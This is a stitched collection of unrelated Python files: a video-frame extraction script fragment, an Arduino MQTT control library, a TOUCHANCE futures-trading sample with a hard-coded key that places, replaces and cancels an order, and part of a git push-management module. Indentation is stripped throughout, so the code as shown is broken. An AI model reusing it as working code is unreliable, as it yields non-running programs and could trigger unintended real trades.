camera_list = ['ir_down','ir_front','ir_left','ir_left_up','ir_up','rgb_down','rgb_front','rgb_left','rgb_left_up','rgb_up']
# camera_list = ['rgb_left','rgb_left_up','rgb_up']
src_dir_dict = {'sanbao_test':'/data/weiyu.li/DMSData/FatigueView/sanbao_test_video',
}
camera_list = ['ir_down']
data_type = 'train'
camera_id = 0
for data_type in src_dir_dict.keys():
for camera_id in range(len(camera_list)):
src_dir = src_dir_dict[data_type]
camera_type = camera_list[camera_id]
dst_dir = './data/{}/{}'.format(data_type,camera_type)
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
video_list = getFiles(src_dir, '.mp4')
video_list += getFiles(src_dir, '.avi')
# if data_type == 'test':
# video_list = [v for v in video_list if 'fengchunshen' not in v and 'panbijia' not in v]
#
#
# if data_type == 'train':
# video_list = [v for v in video_list if 'zhaoxinmei' not in v]
all_num = 60000
running_num = 32
running_num = min(running_num,len(video_list))
batch_size = all_num//running_num
split_videos = split(video_list, running_num)
process_list = []
for i in range(running_num):
temp_p = Process(target=get_batch_data,args=(split_videos[i],suffix,dst_dir,))
process_list.append(temp_p)
for temp_p in process_list:
temp_p.start()
for temp_p in process_list:
temp_p.join()
print('END')
|
aumhMQTT.py
|
###############################################################################
# aumhMQTT.py #
# #
# Python library for controlling an arduino using Arduino_UART_MessageHandler #
# utilizing an mqtt client. #
# #
# Copyright(C) 2015, Destrudo Dole #
# #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation, version 2 of the license. #
###############################################################################
from __future__ import print_function
import serial
import pprint
import sys
import struct
import time
import socket
import copy
import multiprocessing
import logging
import paho.mqtt.client as mqtt
from aumh import *
from aumhConfig import *
from aumhDigital import *
from aumhNeopixel import *
MSG_HOST_OFFSET = 1
MSG_SERVICE_OFFSET = 2
MSG_ID_OFFSET = 3
MSG_CLASS_OFFSET = 4
MSG_STRAND_OFFSET = 5 #This doubles as the add offset.
MSG_COMMAND_OFFSET = 6
MSG_PIXEL_OFFSET = 7
#Digital utilized data
MSG_PIN_OFFSET = 5 #Doubles as add offset
MSG_PIN_CMD_OFFSET = 6
DIGITAL_MSG_CONTENT = {
"direction":{
#Output stuff
"output":OUTPUT,
"out":OUTPUT,
"1":OUTPUT,
#Input stuff
"input":INPUT,
"in":INPUT,
"0":INPUT,
},
"state":{
"high":HIGH,
"low":LOW,
},
"class":{
"digital":C_DIGITAL,
"0":C_DIGITAL,
"analog":C_ANALOG,
"1":C_ANALOG,
},
"get":{
1:"high",
0:"low",
}
}
#Device class ID (For device differentiation)
SERVICEID="uartmh"
#Separating this because when I move the module out it'll be happier.
MQTTPROCESSTIMEOUT = 1
MQTTPROCESSTIMELIMIT = 120
class UARTDevices:
def __init__(self, port, baud=BAUD):
self.port = port
self.baud = baud
self.id = None
self.UMHI = None #Here we want to actually create the
#This will be the class to handle mqtt messages
class aumhMQTT:
def __init__(self, hostname, port, logmethod=None, logfile=None):
self.logmethod = logmethod
if logfile:
self.logConfigure(logfile)
self.hostname = str(socket.gethostname())
self.devices = {}
self.client = mqtt.Client(client_id="uart-mh@%s" % self.hostname)
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.max_inflight_messages_set(100)
self.client.connect(hostname, port, 10)
self.messageHandlers = {}
self.neopixelBuffer = {}
self.timeElapsed = 0
self.timeMax = 200 #(ms)
self.threadInstances = {}
self.threadInstancePipes = {}
self.busyThreadBuffer = {}
#self.threadSema = multiprocessing.Semaphore()
#self.threadSema.release()
self.threadPostSema = multiprocessing.Semaphore()
self.threadPostSema.release()
def logConfigure(self, logfile=None):
if self.logmethod == "logger":
if not logfile:
print("aumh.logConfigure() called as logger type without filename for log.")
sys.exit(1)
self.logger = logging.getLogger("aumh")
self.logger.setLevel(logging.INFO)
self.logformatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
self.loghandler = logging.FileHandler(logfile)
self.loghandler.setFormatter(self.logformatter)
self.logger.addHandler(self.loghandler)
def log(self, data, mode=None):
if not self.logmethod or self.logmethod == "print":
print(data)
elif self.logmethod == "logger":
if mode == "err":
self.logger.error(data)
elif mode == "warn":
self.logger.warning(data)
elif mode == "crit":
self.logger.critical(data)
else: #Mode is info or something else.
self.logger.info(data)
def has_instance(self, name, id):
if len(self.devices) == 0:
return False
if id not in self.devices:
return False
if str(name) not in self.devices[id]:
return False
return True
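# NOTE: Python does not overload by arity, so the two-argument add_instance
# below is shadowed by the three-argument definition that follows it.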
def add_instance(self, name, instance):
self.messageHandlers[name] = instance
def add_instance(self, name, instance, id):
if not id:
self.log("UART_MH_MQTT.add_instance, got no ID.")
return None
if id not in self.devices:
if name != "mhconfig":
self.log("UART_MH_MQTT.add_instance, not configured device and instance was not mhconfig.")
return None
self.devices[id] = {}
self.devices[id][name] = instance
else:
if "mhconfig" not in self.devices[id]: #Triple check so we know if we have some oddity.
self.log("UART_MH_MQTT.add_instance, strangely misconfigured device id: %s" % str(id))
if name in self.devices[id]: #Issue a warning that we're overwriting the old device instance
self.log("UART_MH_MQTT.add_instance, device->instance name already in use. Replacing it.")
self.devices[id][name] = instance
return True
def add_device(self, config):
pass
def on_connect(self, client, userdata, flags, rc):
self.client.subscribe("/%s/#" % self.hostname, 0)
# We're looking at a structure like this:
# %hostname%/neopixel
# %hostname%/neopixel/%strandid%/
# %hostname%/neopixel/%strandid%/set/
# %hostname%/neopixel/%strandid%/set/%led% = (r,g,b)
# %hostname%/neopixel/%strandid%/config = [ o, old data| f, fresh data | u, unknown ] #This is a published path
# %hostname%/neopixel/%strandid%/config/pin = value
# %hostname%/neopixel/%strandid%/config/length = value
# %hostname%/neopixel/%strandid%/config/leds/%led% = (r,g,b)
# %hostname%/neopixel/add = (%strandid%,%pin%,%len%)
# %hostname%/digital/%pin%/aset/%value% #This value gets set
# %hostname%/digital/%pin%/aget #After setting any value to this dir, value/%val% will be published
# %hostname%/digital/%pin%/get #After setting any value to this dir, value/%val% will be published
# %hostname%/digital/%pin%/set/%value% #this value gets set
# %hostname%/digital/%pin%/value/%val% #This is published to
# %hostname%/control
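# Example (illustrative host, device id, strand and pixel values): publishing
#   /myhost/uartmh/<device-id>/neopixel/0/set/5   with payload "255,0,0"
# is parsed by on_message() below as strand 0, command "set", pixel 5, and
# turns that pixel red on the addressed device.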
#RENAME MULTISET TO THIS.
#This is the worker thread to be which waits for timeMax or a send command to be reached
def neopixel_set_t(self):
#Get current time
#if (current time) == (lastTime + timeMax):
# send data
pass
#Note: This can be simplified in the future by actually applying the common method names for each class type.
def on_message(self, client, userdata, msg):
if "/config" in msg.topic:
return None
try:
msgIdent = msg.topic.split("/")[3]
if msgIdent not in self.devices:
self.log("UART_MH_MQTT.on_message, ident [%s] not in devices." % str(msgIdent))
return None
except:
return None
msgL = msg.topic.split("/")
if "neopixel" in msg.topic and "neopixel" in self.devices[msgIdent]:
if len(msgL) < 5:
self.log("Bogus neopixel message received. [incomplete data]")
return None
if isInt(msgL[MSG_STRAND_OFFSET]):
if (int(msgL[MSG_STRAND_OFFSET]) > 254) or (int(msgL[MSG_STRAND_OFFSET]) < 0):
self.log("Bogus neopixel message received. [strand id error]")
return None
else:
if (msgL[MSG_STRAND_OFFSET] != "add"):
self.log("Bogus neopixel message received. [unexpected topic '%s']" % str(msgL[4]))
return None
if msgL[MSG_STRAND_OFFSET] == "add":
data = msg.payload.split(",")
#FIXME, make sure the data len value is correct.
if len(data) != 3:
self.log("Bogus neopixel message received. [add missing data]")
return None
umhmsg = {
"id":int(data[0]),
"command":"add",
"type":"neopixel",
"data":{
"pin":int(data[1]),
"length":int(data[2]),
}
}
if self.devices[msgIdent]["neopixel"].sendMessage(self.devices[msgIdent]["neopixel"].createMessage(umhmsg)):
self.log("neopixel mqtt issue sending message.")
return None #After this we want to leave.
#FIXME, If it fails here, I set it from 6.
if len(msgL) >= 7:
# FIXME, This is the starting point for the revised neopixel mqtt stuff.
umhmsg = {
"id":int(msgL[MSG_STRAND_OFFSET]),
"type":"neopixel",
"data":{}
}
if msgL[MSG_COMMAND_OFFSET] == "get":
umhmsg["command"] = "get"
out = self.devices[msgIdent]["neopixel"].np_get(umhmsg["id"], umhmsg)
if not out:
return None
ltopic = "/%s/%s/%s" % ( str(self.hostname), str(SERVICEID), str(msgIdent) )
for pixel in out["pixels"]:
for color in out["pixels"][pixel]:
self.client.publish("%s/neopixel/%s/config/%s/%s" % ( str(ltopic), str(umhmsg["id"]), str(pixel), str(color) ), struct.unpack("<B", out["pixels"][pixel][color])[0] )
if msgL[MSG_COMMAND_OFFSET] == "set" or msgL[MSG_COMMAND_OFFSET] == "seti": #Set commands handler
rgbS = msg.payload.split(",")
rgbI = []
for sv in rgbS:
rgbI.append(int(sv))
for iChk in rgbS: #Do we really want to perform this check?
if iChk == "" or iChk == None: #If we have a blank message.
self.log("neopixel mqtt blank message.")
return None
if int(iChk) < 0 or int(iChk) > 255:
self.log("neopixel mqtt message outside int limits.")
return None
umhmsg["data"]["leds"] = { str(msgL[MSG_PIXEL_OFFSET]):rgbI }
if msgL[MSG_COMMAND_OFFSET] == "seti":
umhmsg["command"] = "ctrli"
if self.devices[msgIdent]["neopixel"].sendMessage(self.devices[msgIdent]["neopixel"].createMessage(umhmsg)):
self.log("neopixel mqtt seti issue sending message.")
return None #break away so that we don't need to deal with anything else.
umhmsg["command"] = "ctrl"
if int(msgL[MSG_STRAND_OFFSET]) not in self.threadInstances:
self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])] = multiprocessing.Pipe()
if int(msgL[MSG_STRAND_OFFSET]) in self.busyThreadBuffer:
if len(self.busyThreadBuffer[int(msgL[MSG_STRAND_OFFSET])]) > 0:
for data in self.busyThreadBuffer[int(msgL[MSG_STRAND_OFFSET])]:
for part in data['data']:
umhmsg['data'][part] = data['data'][part]
self.busyThreadBuffer.pop(int(msgL[MSG_STRAND_OFFSET]), None)
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])] = multiprocessing.Process(target=self.multiSet, args=(umhmsg, self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])], copy.copy(msgIdent), MQTTPROCESSTIMEOUT, MQTTPROCESSTIMELIMIT,))
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])].start()
return None #Break out completely, we don't want to do anything else.
try:
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])].join(0.005)
except:
pass
if self.threadInstances[int(msgL[MSG_STRAND_OFFSET])].is_alive(): #If it's been started.
if not self.threadPostSema.acquire(False): #TODO: acquire a per-strand threadPostSema here rather than the single shared one.
if not int(msgL[MSG_STRAND_OFFSET]) in self.busyThreadBuffer:
self.busyThreadBuffer[int(msgL[MSG_STRAND_OFFSET])] = []
self.busyThreadBuffer[int(msgL[MSG_STRAND_OFFSET])].append(copy.copy(umhmsg))
else:
self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])][1].send(umhmsg)
self.threadPostSema.release() #Release no matter what.
else: #it's dying.
#Cleanup
self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])] = None
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])].terminate()
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])] = None
#Create new instance
self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])] = multiprocessing.Pipe()
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])] = multiprocessing.Process(target=self.multiSet, args=(umhmsg, self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])], msgIdent, MQTTPROCESSTIMEOUT, MQTTPROCESSTIMELIMIT,))
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])].start()
elif msgL[MSG_COMMAND_OFFSET] == "del": #deletion command
if msg.payload != msgL[MSG_STRAND_OFFSET]:
self.log("neopixel mqtt del command issued with mismatched payload. [%s,%s]" % ( str(msgL[MSG_STRAND_OFFSET]), str(msg.payload) ) )
return None
umhmsg["command"] = "del"
umhmsg["data"]["id"] = int(msg.payload)
if self.devices[msgIdent]["neopixel"].sendMessage(self.devices[msgIdent]["neopixel"].createMessage(umhmsg)):
self.log("neopixel mqtt issue sending del message.")
elif msgL[MSG_COMMAND_OFFSET] == "gradient":
data = msg.payload.split(",")
start = data[0]
end = data[4]
sRGB = data[1:4]
eRGB = data[5:8]
umhmsg["start"] = start
umhmsg["end"] = end
umhmsg["startColor"] = sRGB
umhmsg["endColor"] = eRGB
if self.devices[msgIdent]["neopixel"].np_gradient(int(msgL[MSG_STRAND_OFFSET]),umhmsg):
self.log("bad gradient.")
elif msgL[MSG_COMMAND_OFFSET] == "clear":
self.log("Clear message")
umhmsg["command"] = "clear"
umhmsg["data"]["id"] = int(msg.payload)
if self.devices[msgIdent]["neopixel"].sendMessage(self.devices[msgIdent]["neopixel"].createMessage(umhmsg)):
self.log("neopixel mqtt issue sending clear message.")
elif "digital" in msg.topic and "digital" in self.devices[msgIdent]:
if len(msgL) < 5:
self.log("Bogus digital message received.")
return None
if isInt(msgL[MSG_PIN_OFFSET]):
if (int(msgL[MSG_PIN_OFFSET]) > 254) or (int(msgL[MSG_PIN_OFFSET]) < 0):
self.log("Bogus digital message received. [pin error]")
return None
else:
if (msgL[MSG_PIN_OFFSET] != "add"):
self.log("Bogus digital message received. [unexpected topic: %s]" % str(msgL[MSG_PIN_OFFSET]))
return None
if msgL[MSG_PIN_OFFSET] == "add":
data = msg.payload.split(",")
if (len(data) < 3) or (len(data) > 4):
self.log("Bogus digital message received. [incorrect number of values in add command]")
return None
umhmsg = {
"pin":int(data[0]),
"command":"add",
"type":"digital",
"data":{
"pin":int(data[0]),
"direction":int(data[1]),
"class":int(data[2]),
}
}
if len(data) == 4:
if umhmsg["data"]["direction"] == 1:
umhmsg["command"] = "sap"
umhmsg["data"]["state"] = int(data[3])
#We don't yet want to support gap, but when we do, it'll be here.
if self.devices[msgIdent]["digital"].sendMessage(self.devices[msgIdent]["digital"].createMessage(umhmsg)):
self.log("digital mqtt issue sending add message.")
if len(msgL) == 7:
umhmsg = {
"pin":int(msgL[MSG_PIN_OFFSET]),
"type":"digital",
}
if msgL[MSG_PIN_CMD_OFFSET] == "direction" or msgL[MSG_PIN_CMD_OFFSET] == "class":
pinData = self.devices[msgIdent]["digital"].getPin(int(msgL[MSG_PIN_OFFSET]))
if not pinData:
return None
#change local pin direction
umhmsg["data"] = pinData
if msg.payload.lower() not in DIGITAL_MSG_CONTENT[msgL[MSG_PIN_CMD_OFFSET]]:
self.log("digital mqtt issue with direction message, content: %s" % str(msg.payload) )
return None
#convert local pin mode data to umhmsg
umhmsg["data"][msgL[MSG_PIN_CMD_OFFSET]] = DIGITAL_MSG_CONTENT[msgL[MSG_PIN_CMD_OFFSET]][msg.payload.lower()]
self.devices[msgIdent]["digital"].addPin(umhmsg["data"])
umhmsg["command"] = "cpin"
#call cpin
if self.devices[msgIdent]["digital"].sendMessage(self.devices[msgIdent]["digital"].createMessage(umhmsg)):
self.log("digital mqtt issue sending %s message." % str(msgL[MSG_PIN_OFFSET]))
elif msgL[MSG_PIN_CMD_OFFSET] == "state" or msgL[MSG_PIN_CMD_OFFSET] == "set" :
pinData = self.devices[msgIdent]["digital"].getPin(int(msgL[MSG_PIN_OFFSET]))
if not pinData:
self.log("No pin data!")
return None
umhmsg["data"] = pinData
if isInt(msg.payload):
umhmsg["data"]["state"] = int(msg.payload)
elif msg.payload.lower() in DIGITAL_MSG_CONTENT["state"]:
umhmsg["data"]["state"] = DIGITAL_MSG_CONTENT["state"][msg.payload.lower()]
else:
self.log("digital mqtt issue with direction message, content: %s" % str(msg.payload) )
return None
umhmsg["command"] = "set"
#call cpin
if self.devices[msgIdent]["digital"].sendMessage(self.devices[msgIdent]["digital"].createMessage(umhmsg)):
self.log("digital mqtt issue sending direction message.")
elif msgL[MSG_PIN_CMD_OFFSET] == "get":
ltopic = "/%s/%s/%s" % ( str(self.hostname), str(SERVICEID), str(msgIdent) )
pinData = self.devices[msgIdent]["digital"].getPin(int(msgL[MSG_PIN_OFFSET]))
umhmsg["command"] = "get"
umhmsg["data"] = pinData
retData = self.devices[msgIdent]["digital"].sendMessage(self.devices[msgIdent]["digital"].createMessage(umhmsg))
pinData["state"] = struct.unpack("<h",retData[0:2])[0]
self.client.publish("%s/digital/%s/config/state" % ( str(ltopic), str(pinData["pin"]) ), str(pinData["state"]))
self.devices[msgIdent]["digital"].addPin(pinData)
else:
self.log("Bogus digital mqtt topid for cmd offset: %s" % str(msgL[MSG_PIN_CMD_OFFSET]))
return None
else:
self.log("Unknown topic")
#This handles set commands that can be batched, so multiple set requests are concatenated into a single message.
def multiSet(self, setDictI, pipeD, msgIdent, timeout, timeLimit):
cTimeout = time.time() + timeout
cTimeLimit = time.time() + timeLimit
while ( (time.time() < cTimeout) and time.time() < cTimeLimit and pipeD != None ):
if pipeD[0].poll(0.02): #Poll briefly (20 ms) for new data; a short wait here has little impact.
dIn = pipeD[0].recv()
#No matter the message, we should extend the time limit.
cTimeout = time.time() + timeout
if isinstance(dIn, str): #If we have one of the request inputs [NI]
#Do things for single string
continue
if not isinstance(dIn, dict):
continue
if setDictI['type'] == "neopixel":
if len(dIn) != 4:
self.log("multiSet neopixel mqtt issue with pipe in: '%s'" % str(dIn))
#We might want to send a message back reporting the failure.
continue
if "data" not in dIn:
self.log("multiSet neopixel mqtt issue with pipe in [no data]")
#We might want to send a message back reporting the failure.
continue
for key in dIn["data"]["leds"]: #We're only doing this for the future possibility of multiple led's set in one command
setDictI["data"]["leds"][key] = dIn["data"]["leds"][key]
self.threadPostSema.acquire() #We want blocking from this direction.
try:
if setDictI['type'] == "neopixel":
try:
if self.devices[msgIdent]["neopixel"].sendMessage(self.devices[msgIdent]["neopixel"].createMessage(setDictI)):
self.log("multiSet neopixel mqtt issue sending message.")
except:
self.log("multiSet neopixel mqtt, exception met when sending message.")
except:
self.threadPostSema.release()
return 1
self.threadPostSema.release()
return 0
#Every 10 seconds a publish call posts all known data.
#Every few cycles, each provided class instance type is also queried for
# management information, keeping everything up to date without hammering
# the device with calls that rarely need to run.
def publisher(self):
cfgData = {}
for device in self.devices:
if "mhconfig" not in self.devices[device]: #This shouldn't be possible.
self.log("UART_MH_MQTT.publisher(), no mhconfig")
continue
self.client.publish("/%s/uartmh" % str(self.hostname), str(device))
cfgData[device] = {}
if "neopixel" in self.devices[device]:
cfgData[device]["neopixel"] = []
data = self.devices[device]["neopixel"].np_manage()
try:
if not data.startswith("NAK"):
datal = list(data)
count = struct.unpack("<B", datal.pop(0))[0]
for i in range(0, count):
relI = i * 4
pID = struct.unpack(">B", data[1+relI])[0]
pin = struct.unpack(">B", data[2+relI])[0]
length = struct.unpack(">H", data[3+relI:5+relI])[0]
cfgData[device]["neopixel"].append({ "id":pID, "pin":pin, "length":length })
except:
self.log("MQTTHandler.publisher(), issue handling neopixel instance.")
if "digital" in self.devices[device]:
cfgData[device]["digital"] = []
data = self.devices[device]["digital"].digi_manage()
try:
if not data.startswith("NAK"):
datal = list(data)
count = struct.unpack("<B", datal.pop(0))[0] #Get the first byte
for i in range(0, count):
relI = i * 6
pin = struct.unpack("<h", data[1+relI:3+relI])[0]
direction = struct.unpack("<B", data[3+relI])[0]
state = struct.unpack("<h", data[4+relI:6+relI])[0]
pClass = struct.unpack("<B", data[6+relI])[0]
lPin = { "pin":pin, "direction":direction, "state":state, "class":pClass }
self.devices[device]["digital"].addPin(copy.copy(lPin))
cfgData[device]["digital"].append( lPin )
except:
self.log("MQTTHandler.publisher(), issue handling digital instance.")
for device in cfgData:
ltopic = "/%s/%s/%s" % ( str(self.hostname), str(SERVICEID), str(device) )
for mhType in cfgData[device]:
if mhType == "neopixel":
#Publish configuration data
for data in cfgData[device]["neopixel"]:
#Make sure each dict value contains id,pin and length.
self.client.publish("%s/neopixel/%s/config" % ( str(ltopic), str(data["id"]) ),"o")
self.client.publish("%s/neopixel/%s/config/pin" % ( str(ltopic), str(data["id"]) ),str(data["pin"]))
self.client.publish("%s/neopixel/%s/config/length" % ( str(ltopic), str(data["id"]) ),str(data["length"]))
if mhType == "digital":
for data in cfgData[device]["digital"]:
self.client.publish("%s/digital/%s/config" % ( str(ltopic), str(data["pin"]) ), "o")
self.client.publish("%s/digital/%s/config/direction" % ( str(ltopic), str(data["pin"]) ), str(data["direction"]))
self.client.publish("%s/digital/%s/config/class" % ( str(ltopic), str(data["pin"]) ), str(data["class"]))
self.client.publish("%s/digital/%s/config/state" % ( str(ltopic), str(data["pin"]) ), str(data["state"]))
def run(self):
#Start thread for message/connection handling.
self.client.loop_start()
# Here, we call the method to populate this unique arduino device's ID
#self.getFirmwareName()
# This is the counter value for the modulus statements.
bigCounter = 0
# These are modulus values for calling a separate publisher which
# queries the pin and pixel states via a call to the GET sub-command.
pixelInfoMod = 4
digitalInfoMod = 4
while True:
# This is the most common publisher statement, it shows basic
# configuration stuff and locally saved data.
self.publisher()
bigCounter += 1
#This queries all of the neopixel strands for color and pin data. (active)
if (bigCounter % pixelInfoMod) == 0:
#self.getSettings("neopixel") # This method will save the data to class and perform the publishing.
pass
#This queries the digital instance data for pin mode
if (bigCounter % digitalInfoMod) == 0:
#self.getSettings("digital")
pass
if bigCounter >= 65535: #Let's wrap around at a big-ish number.
bigCounter = 0
time.sleep(10)
|
trade_sample.py
|
import time
from tcoreapi_mq import *
import tcoreapi_mq
import threading
g_TradeZMQ = None
g_TradeSession = ""
ReportID=""
#Callback: change of logged-in accounts
def OnGetAccount(account):
print(account["BrokerID"])
#Real-time execution (order) report message
def OnexeReport(report):
global ReportID
print("OnexeReport:", report["ReportID"])
ReportID=report["ReportID"]
return None
#Real-time fill report
def RtnFillReport(report):
print("RtnFillReport:", report["ReportID"])
#Restore query of today's historical execution reports
def ShowEXECUTIONREPORT(ZMQ,SessionKey,reportData):
if reportData["Reply"] == "RESTOREREPORT":
Orders = reportData["Orders"]
if len(Orders) == 0:
return
last = ""
for data in Orders:
last = data
print("查詢回報",data)
reportData = g_TradeZMQ.QryReport(SessionKey,last["QryIndex"])
ShowEXECUTIONREPORT(g_TradeZMQ,SessionKey,reportData)
#Restore query of today's historical fill reports
def ShowFillReport(ZMQ,SessionKey,reportData):
if reportData["Reply"] == "RESTOREFILLREPORT":
Orders = reportData["Orders"]
if len(Orders) == 0:
return
last = ""
for data in Orders:
last = data
print("查詢成交回報",data)
reportData = g_TradeZMQ.QryFillReport(SessionKey,last["QryIndex"])
ShowFillReport(g_TradeZMQ,SessionKey,reportData)
#Restore query of position data
def ShowPOSITIONS(ZMQ,SessionKey,AccountMask,positionData):
if positionData["Reply"] == "POSITIONS":
position = positionData["Positions"]
if len(position) == 0:
return
last = ""
for data in position:
last = data
print("部位:" + data["Symbol"])
positionData = g_TradeZMQ.QryPosition(SessionKey,AccountMask,last["QryIndex"])
ShowPOSITIONS(g_TradeZMQ,SessionKey,AccountMask,positionData)
#Receive trade messages (subscription thread)
def trade_sub_th(obj,sub_port,filter = ""):
socket_sub = obj.context.socket(zmq.SUB)
#socket_sub.RCVTIMEO=5000 #ZMQ timeout setting
socket_sub.connect("tcp://127.0.0.1:%s" % sub_port)
socket_sub.setsockopt_string(zmq.SUBSCRIBE,filter)
while True:
message = socket_sub.recv()
if message:
message = json.loads(message[:-1])
#print("in trade message",message)
if(message["DataType"] == "ACCOUNTS"):
for i in message["Accounts"]:
OnGetAccount(i)
elif(message["DataType"] == "EXECUTIONREPORT"):
OnexeReport(message["Report"])
elif(message["DataType"] == "FILLEDREPORT"):
RtnFillReport(message["Report"])
def main():
global g_TradeZMQ
global g_TradeSession
#Login (used for the TOUCHANCE ZMQ connection; do not change)
g_TradeZMQ = TradeAPI("ZMQ","8076c9867a372d2a9a814ae710c256e2")
t_data = g_TradeZMQ.Connect("51207")
print(t_data)
if t_data["Success"] != "OK":
print("[trade]connection failed")
return
g_TradeSession = t_data["SessionKey"]
#######################################################################交易##################################################
#Create a trade-subscription thread
t1 = threading.Thread(target = trade_sub_th,args=(g_TradeZMQ,t_data["SubPort"],))
t1.start()
#Query logged-in accounts
accountInfo = g_TradeZMQ.QryAccount(g_TradeSession)
print("查詢已登入的資金帳號:",accountInfo)
strAccountMask=""
if accountInfo != None:
arrInfo = accountInfo["Accounts"]
if len(arrInfo) != 0:
#print("@@@@@@@@@@@:",arrInfo[0],"\n")
strAccountMask = arrInfo[0]["AccountMask"]
print(strAccountMask)
#Query order history
reportData = g_TradeZMQ.QryReport(g_TradeSession,"")
print('All execution reports:',reportData)
ShowEXECUTIONREPORT(g_TradeZMQ,g_TradeSession,reportData)
fillReportData = g_TradeZMQ.QryFillReport(g_TradeSession,"")
print('Fill reports:', fillReportData)
ShowFillReport(g_TradeZMQ,g_TradeSession,fillReportData)
#Query margin
if strAccountMask !="":
print("Account margin:",g_TradeZMQ.QryMargin(g_TradeSession,strAccountMask))
#Query positions
positionData = g_TradeZMQ.QryPosition(g_TradeSession,strAccountMask,"")
print('Positions:',positionData)
ShowPOSITIONS(g_TradeZMQ,g_TradeSession,strAccountMask,positionData)
#Place a new order
orders_obj = {
"Symbol":"TC.F.TWF.FITX.HOT",
"BrokerID":arrInfo[0]['BrokerID'],
"Account":arrInfo[0]['Account'],
"Price":"15000",
"TimeInForce":"1",
"Side":"1",
"OrderType":"2",
"OrderQty":"1",
"PositionEffect":"0"
}
s_order = g_TradeZMQ.NewOrder(g_TradeSession,orders_obj)
print('New order result:',s_order)
"""
if s_order['Success']=="OK":
print("下單成功")
elif s_order['ErrCode']=="-10":
print("unknow error")
elif s_order['ErrCode']=="-11":
print("買賣別錯誤")
elif s_order['ErrCode']=="-12":
print("複式單商品代碼解析錯誤 ")
elif s_order['ErrCode']=="-13":
print("下單帳號,不可下此交易所商品")
elif s_order['ErrCode']=="-14":
print("下單錯誤,不支持的 價格 或 OrderType 或 TimeInForce")
elif s_order['ErrCode']=="-15":
print("不支援證券下單")
elif s_order['ErrCode']=="-20":
print("未建立連線")
elif s_order['ErrCode']=="-22":
print("價格的 TickSize 錯誤")
elif s_order['ErrCode']=="-23":
print("下單數量超過該商品的上下限 ")
elif s_order['ErrCode']=="-24":
print("下單數量錯誤 ")
elif s_order['ErrCode']=="-25":
print("價格不能小於和等於 0 (市價類型不會去檢查) ")
"""
#Modify (replace) the order
reporders_obj={
"ReportID":"4094755221B",
"ReplaceExecType":"0",
"Price":"16500"
}
reorder=g_TradeZMQ.ReplaceOrder(g_TradeSession,reporders_obj)
print("Replace order result:",reorder)
#Cancel the order
canorders_obj={
"ReportID":"4094755221B",
}
canorder=g_TradeZMQ.CancelOrder(g_TradeSession,canorders_obj)
print("%%%%%%%%%%%%%%%%%%%%%%%%%",canorder)
if __name__ == '__main__':
main()
|
git.py
|
# -*- coding: utf-8 -*-
"""
Core Git Module
This module provides a GitQueue to pushmanager, into which four types of task
can be enqueued:
- Verify Branch: Check that a given branch exists
- Test Pickme Conflict: Check if a pickme conflicts with other pickmes in the
same push
- Test All Pickmes: Recheck every pickme in a push against every other pickme in
the push.
- Test Conflicting Pickmes: Recheck only the pickmes in a push already marked as
conflicting.
Notifications for verify failures and pickme conflicts are sent to the XMPP and
Mail queues.
"""
import functools
import logging
import os
import subprocess
import time
import urllib2
from multiprocessing import JoinableQueue
from multiprocessing import Process
from urllib import urlencode
from . import db
from .mail import MailQueue
from contextlib import contextmanager
from pushmanager.core.settings import Settings
from pushmanager.core.util import add_to_tags_str
from pushmanager.core.util import del_from_tags_str
from pushmanager.core.util import EscapedDict
from pushmanager.core.util import tags_contain
from pushmanager.core.xmppclient import XMPPQueue
from tornado.escape import xhtml_escape
@contextmanager
def git_branch_context_manager(test_branch, master_repo_path):
"""Context manager that creates / deletes a temporary git branch
:param test_branch: The name of the temporary branch to create
:param master_repo_path: The on-disk path to the master repository
"""
# Remove the testing branch if it exists
try:
GitCommand("branch", "-D", test_branch, cwd=master_repo_path).run()
except GitException:
pass
# Create a new branch tracking master
make_test_branch = GitCommand(
"checkout",
"origin/master",
"-b",
test_branch,
cwd=master_repo_path
)
make_test_branch.run()
try:
yield
except Exception, e:
raise e
finally:
# Checkout master so that we can delete the test branch
checkout_master = GitCommand(
'checkout',
'master',
cwd=master_repo_path
)
checkout_master.run()
# Delete the branch that we were working on
delete_test_branch = GitCommand(
'branch',
'-D',
test_branch,
cwd=master_repo_path
)
delete_test_branch.run()
def git_reset_to_ref(starting_ref, git_directory):
"""
Resets a git repo to the specified ref.
Called as a cleanup fn by git_merge_context_manager.
:param starting_ref: Git hash of the commit to roll back to
"""
GitCommand(
'reset',
'--hard',
starting_ref,
cwd=git_directory
).run()
GitCommand(
'submodule',
'--quiet',
'sync',
cwd=git_directory
).run()
GitCommand(
'submodule',
'--quiet',
'update',
cwd=git_directory
).run()
def _stale_submodule_check(cwd):
"""
Checks that no submodules in the git repository path specified by cwd are
out of date or too new.
If any out of date submodules are found, update them.
Once all submodules are up to date, calls _check_submodule on each
changed submodule.
:param cwd: On-disk path of the git repo to work with
"""
stale_submodules = GitCommand('submodule', 'status', cwd=cwd)
_, submodule_out, _ = stale_submodules.run()
submodule_out = submodule_out.strip()
# If nothing was returned, there are no submodules to check
if len(submodule_out) == 0:
return
submodule_lines = submodule_out.split('\n')
stale_submodules = []
for submodule_line in submodule_lines:
try:
_, path, _ = submodule_line.strip().split(' ')
if submodule_line[0] == '-' or submodule_line[0] == '+':
stale_submodules.append(path)
except ValueError:
logging.error("Failed to unpack line %s", submodule_line)
# If there are no stale submodules, nothing to do
if len(stale_submodules) == 0:
return
logging.info("Submodules touched in this branch: %s",
' '.join(stale_submodules))
old_shas = GitCommand(
'submodule', 'foreach', '--quiet',
'echo "$path\t$(git rev-parse HEAD | cut -c-7)"',
cwd=cwd
)
_, old_shas_out, _ = old_shas.run()
